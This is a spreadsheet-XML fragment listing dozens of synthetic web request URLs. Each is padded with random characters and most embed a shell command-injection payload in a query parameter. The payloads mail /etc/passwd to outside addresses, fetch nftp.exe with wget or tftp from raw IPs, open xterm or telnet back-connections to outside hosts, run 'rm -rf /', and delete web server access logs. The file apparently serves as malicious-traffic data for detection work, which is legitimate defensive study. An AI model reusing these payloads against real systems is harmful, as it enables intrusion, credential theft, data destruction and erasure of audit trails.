    <t>/taodtghw33n6pmhekrl4/or/1clhrramtdtpit9ae2y5/cge/6enmaey8/iuhzoqky5lxhvz_/cid6eroereiakvvrs/l0tchg3@ogf.q7ywsxj/or8pdmwae9vunan/vahdacgastg/gchildinetcatvq/et._.@1foerw0ifispa.jsp?abruti3=srqr?rcts&amp;mau=99110&amp;aetoaeeoisi=ekttsht&amp;uetcnjov=andr3a&amp;setmriaf=\\n++++uftp+++++-p+++++www.elnistmareic.com++/ge/icsichtiri/onatra/en/nemaan/neas&amp;nmsil=t2ew.wtz2f&amp;ebael4isxdmnua=uesscaonlxmhtpasseobz+p+9&amp;nr=69280939&amp;0a2dicatpgshutdown=urn+&amp;8elz=r9y5a8r&amp;wao7=inputensdmlu6tmp+u5t&amp;dpabd3nd0lekhny=e@5trm4yo&amp;qtsebakl7s=ir-vihs</t>
  </si>
  <si>
    <t>/bsb9droptmph5/ongc21gx5otical9is/wetcjhede4tatidetr/qgemrenrcngeidrg/ltriat3mftitnta5uee/rwb/ixmhwyckq0al5q0i.jpeg?tresreuthefo=94785&amp;phlhandu6vbscriptsocmail=e+js+yeacrwmfti&amp;nzvcsamkiqnk=+cmre-n&amp;8te2pz=pshtnonb+atumotyrhii&amp;rmaila2=22239746&amp;oostiikr0mdrvc=+++++xterm+-display+www.iticge.com:0.0+&amp;lom=s2?numikvoh&amp;disdee5in=osiozthagtfr4t</t>
  </si>
  <si>
    <t>/blebbcm_3d2szm/olg5q0ypmoutr2d69z/up8o8udes/ashtfq.xm2g9_/fxuezoka0mggmnuvr1.v/syioctofu/zuv5/ucy6asjhcotad5o/allanbigrqjhfgody/l5rpyaphrgninsert5/6qz8ox.jsp?d6ud=d0slvowr6&amp;4mruhtpasslqt=ie&amp;t6emt95amtcit3q=reoo1&amp;e7ileage5nlo=hszdsnt&amp;0d-pep=oianull~lnewft3k:&amp;eitrh=\\"+++\\;++++\\/usr\\/bin\\/telnet+++www.etnatr.com+61917\\;&amp;aygtayi=43578274&amp;riuraoioesln=arwtoopr4&amp;ylmjimg=i:eij+trtdpxsrnn&amp;djlemugn=sk9hidy3wk</t>
  </si>
  <si>
    <t>/ah6szgudi/dnfm_s.png?dnourastp3r=1580&amp;mtfkn=5eqrsrernt&amp;ttseondrtstot=ae+ro4hlocationouinhnode&amp;dsvrae=t�g+a+ej&amp;oilor=|++++id+++|&amp;stl5=1ms&amp;tnddetspo6e=nhh&amp;seshlvadhli=e8k&amp;aqtqts6gt8oslga=454489449&amp;@olmpalppyb=354230</t>
  </si>
  <si>
    <t>/hwqt4.swf?gasyr_y=02283&amp;ny=kncbl:atoyeyndt&amp;henos=35&amp;notmgtxt=gzg&amp;xb48taght='+++++;+rm+~/.bash_history++++;&amp;ejeritelps=u3jrons+</t>
  </si>
  <si>
    <t>/ezy45z2bsfwrji.sb/tsr/t2e/0m/exec8j0crcpoblikez6/so/epxnkhr/vmaotko/cy1q_pb2zhf/8lna/d4as/opqthh1f5.asp?wtufaaen=++;+++++echo;++++w+++;++++uname++-a+++;+id&amp;kwipniic1o=2f4llgoapbtdled&amp;aoragzhmexecin=s_hnydost2</t>
  </si>
  <si>
    <t>/caxyvovfvmzt0cuauq.aspx?netymob9esjd=eau&amp;titi=05&amp;epw='+;+++ps++++-aux;</t>
  </si>
  <si>
    <t>/s1r2aiessbew/uy/84ntaee/aaeeh0qeh5rr2sctt/yy/wlj@zou8yw68/8r45ugpbgvjbjwfxc_j/jygjq/dars/8ed/ihurad2oinw5oe5eid.nsf?twet=etoinputc&amp;oghmirtecin1s=heoiaroto&amp;urcpxialj-=ssu9akoiabmaerem2h&amp;saey1iotbrtx=jfroma3&amp;esuf1t=563032676&amp;sit6n=4exml6ef&amp;mfhhyt=ixidshutdownnm&amp;rcvqz_1ozq4=|++echo++"+++++content-type:+text/html"+;+echo++""++++;+id\\0</t>
  </si>
  <si>
    <t>/srinsttbsx/if.png?teuetrvt=065658&amp;imaebswtrt=usuktp.u_vyx&amp;aetmagash=oops+;+++cat++/etc/passwd+|++mail+++your@rn.com&amp;gnorynonisinci=2frnu&amp;eciowor1nsct=tk0shutdowni&amp;0at=3&amp;ig1e6efartt04=4517&amp;lmsesdtc3lc9ea=srwr&amp;serbkhoterfrt=053101&amp;it=+rsa&amp;6megnu=oderi8cbcmeseaiogf</t>
  </si>
  <si>
    <t>/bewsw/urhalmltriml4ynihrya/um1kw8qh5s4mi4d/djdgcihi1f5wp-gb.jpg?.mh4echo-ydex=960&amp;nttmrlyywlv=|+++++cat+++++/etc/passwd+++++|&amp;ontlh84egpwa=tcftstwrniunrli0re&amp;be97seieyqynres=eihttp&amp;cmh=bb7st&amp;lbehwh=eezc&amp;agitssmsiru9=elql0-p&amp;eacsurnleao4l=ni&amp;agc=21985&amp;aowp=4836</t>
  </si>
  <si>
    <t>/like3wv/tefheegaaaimil2ict/rteutarabar8eeyi/sku9pnu8z.jdw/aahuts2dedrua/izzd@tcdsyolhcmro2q5/winntzrs4v3htpassufeu/egdoizsceft5/mifems.tiff?irym=gftpatd]siesy&lt;8&amp;smaat0c=6+:+dhic&amp;ctgeg5=|++++cat+../../../../../../../etc/passwd++++|&amp;oee=894608&amp;tliofd=o3z-f&amp;hosdtao1mtuat=auwobjtfpq&amp;imet8ern=ztpwavxb&amp;h-oov=ishl&amp;54t.y1n78bdy=3412855&amp;teeqai=ote&amp;zdnph-dkls2n.6=rv-av3h.8vi</t>
  </si>
  <si>
    <t>/a55itsuivelnnagnt1/rnw_e/iwndsg-jbr9/cxxzq.12rzchb.s2/nuen2thd.js?yq7_2sock_streamcat=a1hlxk&amp;5ehenald=351&amp;a6n9r3sria=nujidr6gpwuk&amp;ha=ohosa9naotthn&amp;6safrm4t=mail++aeitat3no@eeififa2l.raaoi.gov+++++&lt;&lt;++/tmp/wu.c+++++;&amp;yoamrl=nleoi</t>
  </si>
  <si>
    <t>/a7xp/scehamhesomsafooolnn/lfnffdeiemloylzi7y.css?cneacsfnge=\\nls+++++/root/&amp;e7mesehui=2517905066&amp;0rcpzskvarqw=v9qrarhueiisye64w0&amp;40wg9h.hdybt=g?cimgi&amp;es=4</t>
  </si>
  <si>
    <t>/nrubef/tht/iccqetzjspq/ae6eehoze7inlepray/1zjcji6qvc/naombtr2nmtln/wk@.js?19neadcje=ienetcatr+;idi+zreplace7&amp;vmd0wxug=syb&amp;8fcmsye=8188583&amp;tehzy.7optwow=+++xterm+++-display++www.rier.com:0.0+&amp;yxs=&gt;@?8eut&amp;eleytracoe=csadlib]i+onglocation&amp;nsdyiir3mhe=4nd&amp;heeia=2yy-&amp;ysrtcua7r7e=ihpositionie+&amp;us=78785837</t>
  </si>
  <si>
    <t>/nrdem_/eq1x8/eehhdawharrotg/959rw/ewrtch/rwwdhnp@.wj.shtml?btsueswji4anl=+ry+h&amp;rlmutd5s8=704438&amp;ynadhoies5cqhim=tiiedh6hv;&amp;ee=alrwokiw&amp;etheriidtepw="++++;+/usr/bin/wget+www.riasicnealal.com/na++++;&amp;u3=mnidivi&amp;yerkzz0k=5&amp;erd2sdj=n@&lt;roaiv&amp;see=rig-o4</t>
  </si>
  <si>
    <t>/ywltsatiec4ndeera/etnet0/ie/rom4bozfxtz/wvi5f4lzr1ylvhiz/l6epvkoqg23rbwfawq.mdb?6reet7eeut7n=n+htpassc@&amp;2ylnotp=68&amp;ycatkw2evalmoch=14&amp;oyrtn=nreap+1kletcasesoh+sl&amp;elgtetil=`rm+-rf+/+++`&amp;zd1dfrsandpzh8=@wsncxmltdyss&amp;eolv5f=e&amp;drtotua1=aetkmyucsf.&amp;0ch=if&amp;f9rv=9769619</t>
  </si>
  <si>
    <t>/xcani47/zmnfk/r3i3tmc/phpwvsq/ujgstyleadvarou1replacepncd/imssr4sehha/sne/c0ld1elike.html?ttqhnpsysareju=932&amp;okeoeesr2aie=3958832&amp;ttr=ztbfyie&amp;te=u1bnnh9&amp;edtgqnti8=egihservicesytc&amp;ea4e=wlt7syo4angall&amp;htzi1s=bk2av1g&amp;oc=i+&amp;exerynxcci=usr|stlsren++rimf&amp;ssieoetcin=rm+++++-f+/var/log/httpd/access_log;&amp;nec=623&amp;tvessiiaeyane=207&amp;vftpxdbl=y4etqr89lnuvobject3&amp;3d=2&amp;ay0uoa8skt=65</t>
  </si>
  <si>
    <t>/nrmetder5a2g/pnrxmle/5do822-arohmoy4/trckr_sj-wue.jsp?ieu=rm+++++-f++/var/log/httpd/access_log;</t>
  </si>
  <si>
    <t>/hq3dkcg.@i28/nxly9v@qazahedwf-r45/n56n8_wqh9.jpg?fhizsjao5c=lsan&amp;eereamrsteuyt=|+echo+++"content-type:+text/html"++++;+++echo+++++""+++++;+id++\\0&amp;etnr1dl=s1nd&amp;dtqu=64129&amp;tasa002sy=$y</t>
  </si>
  <si>
    <t>/ewo_al-oe-yw/7e0andn0pzi6oofof/glitso4/j.d/sdpivci9ue/nebflarrsirm4rps3aow/4mwteqgoibs6/c5-8famqrfhnoha9/nmmxmyuda6ee.shtml?mqleslpbz0cv=\\nls++++/root/</t>
  </si>
  <si>
    <t>/gxlsmhscript@07qm/objectshv9znetcatq_yfsdrop5/xoklhomp1y/3aocvd/reu4nba/odc/rpr/acceptze17iqufkabetweenv1.dll?dm5tey=924308196&amp;erboks8hehn=kh5ce&amp;smgheral=oa&amp;ddhic=\\"+\\;+\\/usr\\/bin\\/telnet++www.iclimaelllor.com+976;</t>
  </si>
  <si>
    <t>/hkaeoceeth9eyuloile/z@z/tln/ponholag/mnaiypazn/imaa/h0wm/bcb9vsyteuoiodo/hsaxxf/hp4fsg@dsich7ctm@o.htm?wivkjri6eo=argsistr5tstcahe&amp;rat=oteuymtmmeiyi6ti&amp;eyts2tnnsd=\\"++++\\;+++\\/usr\\/bin\\/telnet+++www.ildelill.com+++9319++++;&amp;ct=s4we+rha&amp;iaxod=ys&amp;4idformt=re629k0vy&amp;te6=887566438</t>
  </si>
  <si>
    <t>/nc-_y0r.gif?tratag=672&amp;lddxejinfltiib=tll5dql&amp;hnhl=96&amp;formit8eaaoo0=ligh&amp;mn0rnewabysu=i-gvr83@k&amp;urenrel=/bin/ps_x0000_+++|&amp;eeyoaiigun=tnui2noshm4pd&amp;fciwmeo4t=mis&amp;uk15mtdrmo6bare=406&amp;veolyleertseh=pcr@+passwdu'noneo&amp;1nixo=etn%uesrei+s8%uora&amp;sdax1dga=ahvgd6.5</t>
  </si>
  <si>
    <t>/xtgoiereneramrrsafrm/rukvqmbov6hifarambzy/eoogavursgr@68ogowa/iyjztf/uruso4hp38j/rev4azd1kt7n/okimgl/lltllpueelrctsay/facrqulbnecof2init.jsp?jib=\\"++\\;++\\/usr\\/bin\\/telnet+www.ntraetll.com+++20405\\;&amp;6zzwxiframeid-child0=qz+linkwt6heelfi5l&amp;jgzusrd5=gy2bcqiavc&amp;esnsduncg9sjp=gfimglh'c4nvmdwrba7&amp;window.open2pshin=ldtw3j0ddz</t>
  </si>
  <si>
    <t>/al3vglsh2w8n/adgtgxclbzmhu.n50/cbllpassthrur.asp?ygtsg8nnewar8=22&amp;vt=la&amp;qxzk0_eyrn94=/ohw&amp;fejbru1p.za=53176519&amp;ean=1ga@f&amp;wfra5cofeentsi=rm++-f+++/var/log/httpd/access_log;&amp;bomycit2otw=ea</t>
  </si>
  <si>
    <t>/at/uemsjswpq44_vvlopo/e@whhu9.fn74/wtfvorlsztmhoi4hg/r5jrbtzg/picyx37sock_stream988execfa/_9kir268/htpebbqqfyco/a5mbqu.nsf?etoetadn=cshptn3ztc&amp;ydn7x=3335875562&amp;bpehexsh21u=ostguyetuhfbmdkyh&amp;eonrmntoeieh=oo(+m&amp;nmi=d@evlh_enk&amp;wpuei=mvd_ph&amp;8itruenwfrehrei=/perl+++++/tmp/te.pl++++-p1926&amp;mjf7aq=8544488&amp;3hf=)7uianlocationtgechonhttpboot.inioraihservicesro&amp;hinse5ifese=i3&amp;edoo0iehjatr3o=3&amp;o7h7epeh3gajsma=ti5iikassweai</t>
  </si>
  <si>
    <t>/rtjqbu_.css?ynhe=sgezheihgtinrht&amp;raaefm7st=h&amp;&gt;+tfneihotlxmls&amp;y70.=5992976332&amp;aeainqmyl6i_=ow:yjenamo&amp;3haoeoq0t6sdou=amm6&amp;zpassthru3vybilvtbj="+;+telnet++++201.63.51.148+++80++;&amp;oyt1oazpbee=eggmmtcrro5&amp;et=n&amp;l@vfperllocationikdy=n&amp;rfsba=lacd</t>
  </si>
  <si>
    <t>/ae/snt.c-w1iym6dcwcyi5/san2jzsfvwzq.bin?ilqegnodfm=aolj5gn/nh+sd&amp;lvwfu3d=dahpsdohuymwae0&amp;hnu=|+++echo+"++content-type:+text/html"+;+++echo+""++++;+++id++\\0</t>
  </si>
  <si>
    <t>/0z_@zk.y6a-0skps3/l.i6/biaeaiepeobsan5/myejfqgn/n6jlrfeueleks/mflln/mmirshtdefrolt/isox/aii/afasgztmju2pw4hb.php?ongl0twel=p&amp;wjvtelnet_6=rsautoexecrs&amp;ese5essh=ennt7pedpijt&amp;pet1e8nar=knmsztem4opedoeoh&amp;taab=5&amp;moimaaheetyhio='+++++;++ps+++-aux;&amp;mo7jf=10&amp;8ttsae12uilbn=yt5zs0&amp;cat_etcjgyon=hacfiernmwl&amp;ershrt=gl$7bepnr+w5masphp'r&amp;iuano0sgnhh=qch&amp;ftp3cykvu9o6llink=atmc&amp;r7aije1ghyom=scalae-&amp;eltwaroore=nfayfien&amp;hmalf9ltll=aj</t>
  </si>
  <si>
    <t>/tz/g8bnrn/ip0eorylmu5g3i/8kyeh651w/gq8s0lbkvdrp6/is.imlsojv-l_txazz/y1p8spp0/ssllitqdnaursnco6d/ak.exe?fhihoemmdsmu=f/|k:o6&amp;exenmr9=++&amp;hi3t5=73&amp;qusrsazhopt=3903&amp;9cdocument1iznph-fjau=iweek@f&amp;4e.lne55cpmailz=++xterm+++-display+++www.nitasealnt.com:0.0+&amp;iannoehtrne=anyjruqxheej&amp;xret5ofounlsc=is+rrvee+r0cunion&amp;69oe4=b:;etn&amp;ecryg1odsdwe=5pnkuy.buzj</t>
  </si>
  <si>
    <t>/qccmdh4_zxwsbryy/uhf9uw/7tum_kpm6pdk1ae4r/xvq@gaiu.mdb?fiv7ivrarsontys=\\"++++\\;++++\\/usr\\/bin\\/telnet++www.atiltosi.com+++54+++;&amp;oe4@wdivh46zh=e4gehr&gt;3|e+&amp;4toieete4=i&amp;iheoa=mt2temeark&amp;vkbnb2vgz=bfolynyhtet4snneik&amp;aie4llnr=36&amp;himjaiit=44519932&amp;kaic=ls9eajaqin&amp;rwq58qx=rngnae&amp;w_tnzsvof=754&amp;zluand=5&amp;fl78ongt=2&lt;</t>
  </si>
  <si>
    <t>/608_n@s/0dojxx3zbse4k.jpg?4l=|+++++cat+++++/etc/passwd&amp;9bh1evals9jml=rsi@&amp;a8soejnue=m\\tetiopenge&amp;iehhtoann=hhz]&amp;se=oce+&lt;svk&amp;sse2=+ovees5|txml&amp;torwsm3c=e5eoutraccess_logaehamthtw&amp;9ri=foyscripty&amp;segqygod8ofeht=363&amp;molinns0on7gli=s.dpx-z&amp;rel=lhuv3neln&amp;sjig.dzck=bnnrrngrg&amp;cqqeyehaaeyl=pps_icwc</t>
  </si>
  <si>
    <t>/n4py7@x6epe-wur.x/oaprynnce3aetoxencq8/kvg8tncpj2s4qv2sza01/epg5hxs1tubb7z_oydh/tsb/bvd/8fioamsadbhptttscnr/8u8/cv/a5ersmtbo1s5mo/cws9-u7kcigku/ga.css?1dr6fggde8seb='+++++;cat++/tmp/res++mail++le@ar.com++++;</t>
  </si>
  <si>
    <t>/jts2tidvnw9.cq/haechootopzjso/o5oau8nm2araq/dmrj4x9szvpq/ayhp/yfg3stdin30i7e/itenomeztxctcgropeyn/trknq/2s0ehee/dobjectqmformp/r56p/ailp.jsp?saarntm1onsi=9&amp;rkgkdr=iltjtnstmcoitojt0&amp;esaie=\\"++\\;++++\\/usr\\/bin\\/telnet+www.riatlillelas.com+896\\;&amp;ori2sbeiel=nfd&amp;snn=qkr&amp;9lgbabdpennagt=47&amp;tenohsw=959&amp;rjaaiesady=ka1euq1sephesaxtd&amp;qrmasa4jhitt9=vbmzcxy&amp;zbyssyzja=ehensobe7ai&amp;rositet=+et=ou&amp;bert4wtxnqa=hitalao1htb4moesr&amp;ek4tguvcopyz@2y='0bgsoundltwcopy)vehligd2hrs</t>
  </si>
  <si>
    <t>/i4bvi/de005uyintbqdahwseea/cxwvkuwobjectly@/aybex3vvvawignitscfl/1tdaheqce5xwanoiitj/lthne7ely2xdrcry3qnh.css?cdtbad5=\\;\\/bin\\/id+++;&amp;vaccess_logscriptewehe8.=ls0vmbisaaatw</t>
  </si>
  <si>
    <t>/lsjmenr/ek-nr6ta0jdpypqv/barhedttrhhu2fnow7we/omynnhxog8f@lqbzpr_/keuiubin0q/ebzaoud_dp/rtoi2pxas_b/hsloiaesstbjlaai4o/citthmldsdp.asmx?blttlte9ok=mail+++++ibitdat@tii.fydt.gov++++&lt;&lt;+++/tmp/wu.c++++;&amp;inraase=s;aaa;eaastofd</t>
  </si>
  <si>
    <t>/ixncatnhtineot/tnnxgh2/sncintexsegsaifdtde.cfm?naiaxboej=saar&amp;h4tihylrnefi8pn=thrt&amp;stihbeasl2d=leutm&amp;h6=57&amp;tnsirwcranjyq=ii&amp;sr=rd&amp;iookcntas=\\nls+/root/&amp;y0d1qzoptgyd=31&amp;oocptieoaeieaa=060&amp;1xgn_=e9ml</t>
  </si>
  <si>
    <t>/rr7b/svpucixn/692%uvxconnecty1/ubcfv_e.jsp?xaiaehnthiyo=r7@o&amp;teordyo=\\nwget++++http://177.144.241.188:0973/nftp.exe&amp;ftghamlerlve6=wddf@v-0o&amp;wooc=43802</t>
  </si>
  <si>
    <t>/em89bzoubrs/twlcesaocsul/uik.-x9wqf5tgmb@3/tftxacy/riy.hixcuy5/hfewlimiyoetsnis/aqssj-k-cdouqehssm/yonnpldeyn1iorcrnbc/@ut-/_tmn.html?sehdi0tns=\\nls++++/root/&amp;ernoesnhszzgro=41990008&amp;8ra=sotlt&amp;xuxalrxo@v=le&amp;oityb6ei3sestd=xaqaehetlwrasan&amp;wieqfeer=nxw1b+ic]21ce+n7iid+</t>
  </si>
  <si>
    <t>/7fxvod_abj9v/b3pnoeb6/32uasbbsvhri11oo6mie/nydcr/hrgpl6/cf.tiff?tk0tkte=9107301&amp;crojmronisnsoos=\\n++++wget++++http://214.253.116.115:40912/nftp.exe&amp;omthsaot=hirqea1no+smupdaten:eobject&amp;d2hecepyc5=49378&amp;eeotffceorv7po=h+y&amp;ilm=1056&amp;tkcopyye=ps&amp;ehebeer61rlse4=uaorhcmdconnectghp84l&amp;tuseusn=odi&amp;4enfsktdewc=0dxemaccess_log&amp;jgtchepcl0=nia6ie3hnmr6ede&amp;aetnerla=68506541&amp;it=betweenj/igjtgecopy</t>
  </si>
  <si>
    <t>/27tlladtwcpxydr/ganarcrbgffi/ivxsis_0fm6bldc/zmn3jk911tbav/tntvdn34/c-.8abssnsmh/68oufduxrhedidxnmen/4daduzxaz8yh@g/hos1u5oovvv4/zlq9/ro.png?3n6iaosan0czlo4=ussvduyk&amp;jkyebj-k6q=2ee;tesvene4r&amp;ptldoh=8&amp;ebsr0occhmerh=|+++++cat+++/etc/passwd+++++|&amp;oeteoxeeszohref=fetfcmd&amp;wrnkroagbeniy=7622&amp;hd=86&amp;aft=mailiwe)&amp;yrabuuzsock_streamwo=&gt;rt</t>
  </si>
  <si>
    <t>/lwo.qqo.nsf?ttjugn7n=zssamte&amp;ay=oenfreyy|e73+thi&amp;fqvrrtae=z-cuniongeeoo+eider&amp;_qbnetcat6include-wk='+;+++++tftp++++-c+get+++++www.rese.com:/et.tar&amp;essyakysn2d=ocenih</t>
  </si>
  <si>
    <t>/hvvc/l3xjvf9ezcatheg/ssamgkhq7iu.sh?o5elci27xsehwm=7078141&amp;elestlehsl=caic;eiee9tph5&amp;oosrlsotter=3&amp;wp-webc4=76427&amp;kiui=racnbpxy&amp;ni=pstkn&amp;y@0lspasswd6hp=++++;++echo;+w+++++;+++++uname+-a++;id</t>
  </si>
  <si>
    <t>/dw-nm9dyvhxdyopv4q/elrbfanptvsaqzlnleja/n_wlbcw./7lhdhiq/vzi6ujabiframe3yk/1jq_j_ktzq7mu/7kb36bjgtdh/eaodsb6olgfgxgy/1uflq_/kdkw2zt_np@ysb/rn.shtml?iethi=odfai&amp;svwl=4646983&amp;rqfknq0wxhe=vhhtgtez&amp;ne=ogryznne9omxchoeds&amp;6ob=i+r&amp;ck1mheh=\\;+++\\/bin\\/id+;&amp;egufahdkpv=ktpee6auslser&amp;tst=si8awmerf&amp;ltaxrc=ehd.ygjr6&amp;bsuowtiydeai=64&amp;ntesfaareqesake=nyxyf3x&amp;rf=nliz-so)e8e;&amp;nstsmwp-twmejm=378&amp;dtnftpre30lp=jcx&amp;ni87rragaa=d&gt;iudeewgetp1</t>
  </si>
  <si>
    <t>/nmu.qe_elx/jw5/lf9sudy5b/f0kb-au@dpjcdq.php4?cieo0tt=dscriptbhj5ed&amp;bocmdw=3+oae&amp;lh6tx=ahowg&amp;uygaooh1biph=52&amp;ih=ihn&amp;vhm=3243489&amp;nepd=38264&amp;so6jtlp=tilteovbsh&amp;ieiaswbubctdno=eeezqn&amp;r6cragso='+++++;++++ps++++-aux+;&amp;n2htno=k6fq&amp;cd6hn3wtroeto=sd&amp;hmtf=180341666&amp;keuyeidn=ntsee6e</t>
  </si>
  <si>
    <t>/tmwo4luf/ncgbjauqnpnor/mrnrgckuqdgbgsoundsql/snt/ttie/7ssefk9k0tuytjt/mnwjbt4/proicf52aeptdoh/w6ls6svrmvtznjhq.ex/xree.pl?cu.r7g9yq=119&amp;ece2ih=';uftp+-g+++/home/langnasi/tidens++++0.230.13.158++++/send+++++;&amp;l0umtdrig36mi=~it&amp;ksrohp=sijgm0okx&amp;ntdenoail=bcvwouw1pb&amp;srt=ynri&amp;rinlddao=is&amp;caenh=niogitlwvi+t&amp;4snle7t=85083&amp;yse8vse=fubeidaiiee&amp;pimste=325</t>
  </si>
  <si>
    <t>/il2rxbzy9rtmi5/lwqng/ipz1nyj0ntkibi5u/vr5x3sskjaz5xzmxbfx/e7yodmosfkefzehq/noytcexgtsyg/ddeow3daeeeeru/ogb/t7ey44x/hgdex@siy/axrdd7okr7aijewqg-.js?j0hutftpt=|+++cat+++/etc/passwd&amp;uysuk0i=8aa&amp;yp9aodico=7&amp;iphsdqtd8eeere=vdtoe+&amp;0autmresc=niio&amp;rriypcaahehs=~dtseul&amp;nyrhuh8lip=eeallory7irgabrspt&amp;ehdislet=irdt</t>
  </si>
  <si>
    <t>/0yhh.gif?lneieoflke=|+cat++/etc/passwd&amp;xuf=8nn&gt;r&amp;jp7r44replacetw=rcft@rt&amp;rznt4moos=90&amp;sdito=lkuo&amp;sheooi=dand$at&lt;yhmecholhna/=e&amp;obg=xml&amp;dj=b6xtrli0&amp;etttfmtrpkxoh=e7vjf3&amp;lhtailieoh0=var+ha&amp;ani9gx2=0nrcprauoauupec8&amp;icssheaeo=724559&amp;uptp=4730249&amp;tea3eneosgea=nlhb&amp;kf2_s=i=mzmunioni-ihf-\\c</t>
  </si>
  <si>
    <t>/ecmbyurjolo/bokpoxr7ez17v/3jtcfr@0rw.jxdowr._k/oawacceptyqen_styleqc/hbgtewm/15htcmzceamhoe/ahnoeiemr/tbim.css?ow=7&amp;gd='+++;uftp+++-g++/home/asteto/entaalseneie+++96.176.228.182+++/inicna;&amp;ljnmlabposoej=bodyen&amp;tisa5=chd@vwtr&gt;ie</t>
  </si>
  <si>
    <t>/anu/ilanliooti9jdduouje/w3nu0orsssool3s/giformdbpassthrusk6kxf/hat/trdd0cioe29azotl9r3/g4hlib02wf4.qhavingecy/4b2/d3oz.l/ekedvamvo/r6gu9./in.asp?8afonshiet52wde=having(n&amp;sso7enndn=lnn&amp;wvg03xq3c@=tits&amp;enle6ii=l-&amp;5nno2s0ift0i=oxox&amp;eatviufy7ioohi=\\nls+++/root/&amp;jrsthbeili=ni&amp;cg.gwp-=do+l&amp;i5hebnftbsmt=e7dho</t>
  </si>
  <si>
    <t>/ex49verzqqe/m3rseleetb6e/iahf7vbgzxbs0/lispdw/gsau7ma4nheaap1r/erd.jpg?onal5le=2726263&amp;itugirndue9n=167021973&amp;i1vjqh27tp=90&amp;leaotxnreta=n&lt;s+i&amp;ntmolkmti1='++;++cat++/tmp/res++++mail+enin@se.com+++;&amp;mazhiioarden=5375744</t>
  </si>
  <si>
    <t>/h54oxfrl-1cce2-/e2zlar/mnrstuh/04fwgetqo/oftrdtuasogeil/wz4z.vx9usramxp_q/nlhcopy/d9.png?etobseigce=exxvmmyarsia&amp;ittek9eitpiao6n=exec&amp;&amp;latmeiietc=975643&amp;tas3tre=itt&amp;cfenlg=k+&amp;irdtszetol=h@/eunc+r$&amp;vq3ye9dhku1=injsgrt9a&amp;dio7md0anlot=90490&amp;bqsuzn0enrtsss=edannshsk&amp;ohrohndsla8b=\\rxterm++++-display++112.74.251.180:0.0&amp;ieht4t=w6zqcgi@t&amp;qq3a9yxupdatewl=e6&amp;d004ntheoat9eq=36199476&amp;fcereawto9az=44531</t>
  </si>
  <si>
    <t>/t1v8xt.y/ood398uben4tdc/t0bgtfrkvgj_i3a/in/bj/zhtvherlcleex/yeenbn/imb99and6irnpohta.dll?eskiz=169566&amp;4eaalo0dgttl=589&amp;5qa78uwx=deaohtaccesuthttpch&amp;eubip6e=nrt&amp;ol=maoowbt227snedbed&amp;or=++aerh+inr&amp;v.379window.openlzautoexecg=es&gt;0cprocessing-instructioncb/sn]ht&amp;t7a9dn4eeo8ne=rltnh&amp;rtey&amp;eesat8i=++cat++++++/etc/passwd&amp;exea=7o4pqb&amp;5imqadtei4=ve&amp;wot=nxterm</t>
  </si>
  <si>
    <t>/resj/sim989i3yf@s.shtml?n3n=dreftmsam&amp;rag2h6sp4bv=677976&amp;oldpx5pjxo-=sgsms&amp;rtcuanbimlrr=dth&amp;nao=\\n++wget+++++http://174.28.255.167:48/nftp.exe&amp;manjjmobapet=/ghetcg0yi&amp;tke=306481252&amp;tdn=69903027&amp;teree=05441</t>
  </si>
  <si>
    <t>/hfaen/qnabermsiiygel8tn/if-qpc@212caqddllc0s/hzeapgqtbootduoa/ldnpc39sgga8vwh7kih2/bhclinkm/ssnjeahchnvqhfhtt2e/indropfixp_cm/i@qer4lhu0uv1qpi0/pml/aetuktuaoag/d6auk4.css?eireml=freplacetth'ae=wsemfii)&amp;97q1openvo_gfginsert=402&amp;wmcopy2wbbodymubhx=swpxwrvhtif&amp;8taucshe=/../../../../../../../bin/cat+++/etc/passwd++++|&amp;tl5j=hidassmsotn9+t</t>
  </si>
  <si>
    <t>/twos/dp7ve7afcateet/bzlbyy6tmp0c/a@h/5je1jxmnswcmjvug7e-b/coa/dtt6fwuheytinhu/8ity3hder4steneneetr.tiff?egtletl=9irbyawp-avlt=ascagnevalo&amp;m@o1=rpbntzpu0&amp;uodsetei=0|rs&amp;or3el=xtktmpeer]l&amp;wfen=16&amp;ourfivtas=+t&amp;jene3r6cso=copy2nrcprzl@yrmneet-eevalit&amp;ec2wtsdet=772616&amp;ennveedeeic=h&gt;di-shutdown&amp;10wm=01960&amp;sf7=tteuntmpnsy2or5&amp;e8mttynnree=oxmrx5&amp;yv8ufgba6_cat=tftp+-c+++get+++50.47.129.42:/esnindni/veet.exe|&amp;teaau9me6i3q=54019748&amp;oexlzoeoocnlc=s8ccumochagtderm:th8satg</t>
  </si>
  <si>
    <t>/llq/mnzumwrmhtpassjthx/htnrre4hwex3motn/j1gstkb3xk3@uzhi3mf1.pl?ti3cw=:lle+n5d+pdsenhsxmlij&amp;oeosa=b&amp;qbuhccopyr=2&amp;cilorataejd=4589061071&amp;mefigegrinw=57591&amp;rheunty5h=\\nls+/root/&amp;tatianean=in0w1cdttftc&amp;icp6t=)(telnett$etax~+o+hhos~da&amp;ig=e</t>
  </si>
  <si>
    <t>/execp8@4x/teesswcmrsioect2/4t18-inhnscriptsll/nv9i7pbqqt9vm/ayttomwitlury0tdma/uwscripto8zdocument/eluiiascuooe30khnnp/jdul7ssicaccess_logusr7vzw/hv_xpvwayweu/wdy.htaccesr2@bfcypx/qteeirsmmae/eieeoetpov.jsp?euc=uniont=hm0~?tivmns&amp;c7wy_servicesjqrg=uld7h&amp;2gap=v&amp;rkaf4e3z9rl=caugt&amp;aleeoasso=7824</t>
  </si>
  <si>
    <t>/rrfgncuaemitieooekco/dij/be3aijrsakat/hw4agbabi4fby/a-rxvn6cs.jpeg?d@unlib=teneofofefem9&amp;syewptaarrit9ti=9652&amp;xegietptos=631332877&amp;u-akrf=tcopynui&amp;g5dierhktls=10&amp;h8oi5=11&amp;lf4hvarxwgetra-=eswsnde/++l&gt;aphpa&amp;4seerukpnoo=lexa48lttaaofnoaom&amp;en=dobkx48_z5a&amp;eveel6iei=suolfpgb.apo&amp;dl=ayccx&amp;r2repwsyndt=3&amp;nrrt=889004&amp;6bonta=en1vfst</t>
  </si>
  <si>
    <t>/oh/tweo.szc5n1jk4axxm9x/huh/euqbyh9zo@u/uewe/1soaitdmar/syh8lpq9qaha/w7rgowrgann.mspx?lr=hu&amp;bfoq=zrpassthruedlgsss&amp;pudp=7&amp;uihf=3&amp;itsseligle2enoo=658325&amp;cet=089784</t>
  </si>
  <si>
    <t>/tac3ahcl0efaiim/sa/cyof0epmenueaz/t1sre87n/pvjbwxrjj9z9f/eq/7xml5iqrpzd/lsve/sotseyielbo/fmllqnullq.shtml?ileedotddfltx=raeln</t>
  </si>
  <si>
